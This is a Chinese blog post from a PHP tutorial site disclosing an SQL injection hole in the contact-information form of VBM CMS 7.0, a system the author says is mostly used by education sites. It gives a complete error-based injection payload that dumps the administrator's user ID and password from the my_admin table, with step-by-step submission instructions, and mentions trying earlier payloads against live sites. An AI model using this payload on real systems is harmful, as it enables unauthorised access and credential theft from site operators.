来源:自学PHP网 时间:2015-04-15 14:59 作者: 阅读:次
[导读] 最新版本7 0官网地址http: www vbmcms com index php目测全是教育站由于7 0版本收费 于是在网上下载了6 0免费版本的来看,还发现不少漏洞 各种insert 注入 各种update注入 但是我构造出语句后去网...
最新版本7.0
官网地址http://www.vbmcms.com/index.php
目测全是教育站
由于7.0版本收费 于是在网上下载了6.0免费版本的来看,还发现不少漏洞 各种insert 注入 各种update注入 但是我构造出语句后去网上找站测试都失败了 7.0补了很多
但是在修改联系方式这里没有过滤
漏洞文件\member\include\inc_base.php
这里都没有过滤直接传入SQ语句
那么随便选一个 选cname吧
构造语句
UPDATE `vb_member` SET qq = ’1141056911′, tel = ’15071810222′ ,cname = ‘ɵµõ’aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (concat(userid,0x3a,pwd)) from my_admin limit 0,1),1,62)))a from information_schema.tables group by a)b)#’, email = ’1141056911@qq.com’ , sex = ‘男’ ERE userid = ‘Sunshie’
然后来到会员中心 在联系方式 吧这里的联系老师 或者性别改成’aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (concat(userid,0x3a,pwd)) from my_admin limit 0,1),1,62)))a from information_schema.tables group by a)b)#(性别用谷歌审查元素修改)
然后点提交
然后密码就爆出来了
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com